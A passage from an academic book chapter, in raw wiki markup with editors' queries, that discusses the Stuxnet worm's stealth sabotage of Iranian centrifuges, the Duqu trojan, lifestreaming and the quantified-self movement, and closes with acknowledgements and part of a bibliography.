&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. [Eds: Do you need to give an indication as to what some of these questions might be?] The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers [Eds: does an 'and' need to be inserted here?] carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. [Eds: again, do you need to provide some examples of these important questions] However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
